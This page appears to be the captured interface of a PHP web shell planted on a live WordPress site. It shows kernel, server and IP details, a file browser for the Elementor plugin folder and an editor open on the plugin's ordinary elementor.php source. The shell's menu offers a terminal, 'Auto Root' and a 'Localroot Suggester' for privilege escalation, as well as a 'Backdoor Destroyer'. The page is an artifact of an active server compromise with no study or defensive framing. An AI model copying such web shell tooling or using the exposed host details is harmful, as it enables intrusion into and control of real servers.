Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-content /
plugins /
elementor /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
assets
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
core
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
data
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
includes
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
migrations
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
modules
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
vendor
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
vendor_prefixed
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
AGENTS.md
6.45
KB
-rw-r--r--
2026-08-20 14:06
CONTRIBUTING.md
4.71
KB
-rw-r--r--
2026-08-20 14:06
changelog.txt
344.5
KB
-rw-r--r--
2026-08-20 14:06
elementor.php
4.34
KB
-rw-r--r--
2026-08-20 14:06
license.txt
34.32
KB
-rw-r--r--
2026-08-20 14:06
readme.txt
30.81
KB
-rw-r--r--
2026-08-20 14:06
turbo.json
253
B
-rw-r--r--
2026-08-20 14:06
update-snapshots-linux.js
1.49
KB
-rw-r--r--
2026-08-20 14:06
Save
Rename
<?php /** * Plugin Name: Elementor * Description: The Elementor Website Builder has it all: drag and drop page builder, Atomic Editor, pixel perfect design, global and reusable style systems, mobile responsive editing, and more. Get started now! * Plugin URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash * Version: 4.2.3 * Author: Elementor.com * Author URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash * Requires PHP: 7.4 * Requires at least: 6.8 * Text Domain: elementor * * @package Elementor * @category Core * * Elementor is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * any later version. * * Elementor is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } define( 'ELEMENTOR_VERSION', '4.2.3' ); define( 'ELEMENTOR_MINIMUM_WP_VERSION', '6.8' ); define( 'ELEMENTOR__FILE__', __FILE__ ); define( 'ELEMENTOR_PLUGIN_BASE', plugin_basename( ELEMENTOR__FILE__ ) ); define( 'ELEMENTOR_PATH', plugin_dir_path( ELEMENTOR__FILE__ ) ); if ( defined( 'ELEMENTOR_TESTS' ) && ELEMENTOR_TESTS ) { define( 'ELEMENTOR_URL', 'file://' . ELEMENTOR_PATH ); } else { define( 'ELEMENTOR_URL', plugins_url( '/', ELEMENTOR__FILE__ ) ); } define( 'ELEMENTOR_MODULES_PATH', plugin_dir_path( ELEMENTOR__FILE__ ) . '/modules' ); define( 'ELEMENTOR_ASSETS_PATH', ELEMENTOR_PATH . 'assets/' ); define( 'ELEMENTOR_ASSETS_URL', ELEMENTOR_URL . 'assets/' ); if ( ! defined( 'ELEMENTOR_EDITOR_EVENTS_MIXPANEL_TOKEN' ) ) { define( 'ELEMENTOR_EDITOR_EVENTS_MIXPANEL_TOKEN', '150605b3b9f979922f2ac5a52e2dcfe9' ); } if ( file_exists( ELEMENTOR_PATH . 'vendor/autoload.php' ) ) { require_once ELEMENTOR_PATH . 'vendor/autoload.php'; // We need this file because of the DI\create function that we are using. // Autoload classmap doesn't include this file. } $deprecation_func_file = ELEMENTOR_PATH . 'vendor_prefixed/twig/symfony/deprecation-contracts/function.php'; if ( file_exists( $deprecation_func_file ) ) { require_once $deprecation_func_file; if ( ! function_exists( 'trigger_deprecation' ) ) { function trigger_deprecation( string $package, string $version, string $message, ...$args ): void { \ElementorDeps\trigger_deprecation( $package, $version, $message, ...$args ); } } } if ( ! version_compare( PHP_VERSION, '7.4', '>=' ) ) { add_action( 'admin_notices', 'elementor_fail_php_version' ); } elseif ( ! version_compare( get_bloginfo( 'version' ), ELEMENTOR_MINIMUM_WP_VERSION, '>=' ) ) { add_action( 'admin_notices', 'elementor_fail_wp_version' ); } else { require ELEMENTOR_PATH . 'includes/plugin.php'; } /** * Elementor admin notice for minimum PHP version. * * Warning when the site doesn't have the minimum required PHP version. * * @since 1.0.0 * * @return void */ function elementor_fail_php_version() { $html_message = sprintf( '<div class="error"><h3>%1$s</h3><p>%2$s <a href="https://go.elementor.com/wp-dash-update-php/" target="_blank">%3$s</a></p></div>', esc_html__( 'Elementor isn’t running because PHP is outdated.', 'elementor' ), sprintf( /* translators: %s: PHP version. */ esc_html__( 'Update to version %s and get back to creating!', 'elementor' ), '7.4' ), esc_html__( 'Show me how', 'elementor' ) ); echo wp_kses_post( $html_message ); } /** * Elementor admin notice for minimum WordPress version. * * Warning when the site doesn't have the minimum required WordPress version. * * @since 1.5.0 * * @return void */ function elementor_fail_wp_version() { $html_message = sprintf( '<div class="error"><h3>%1$s</h3><p>%2$s <a href="https://go.elementor.com/wp-dash-update-wordpress/" target="_blank">%3$s</a></p></div>', esc_html__( 'Elementor isn’t running because WordPress is outdated.', 'elementor' ), sprintf( /* translators: %s: WordPress version. */ esc_html__( 'Update to version %s and get back to creating!', 'elementor' ), ELEMENTOR_MINIMUM_WP_VERSION ), esc_html__( 'Show me how', 'elementor' ) ); echo wp_kses_post( $html_message ); }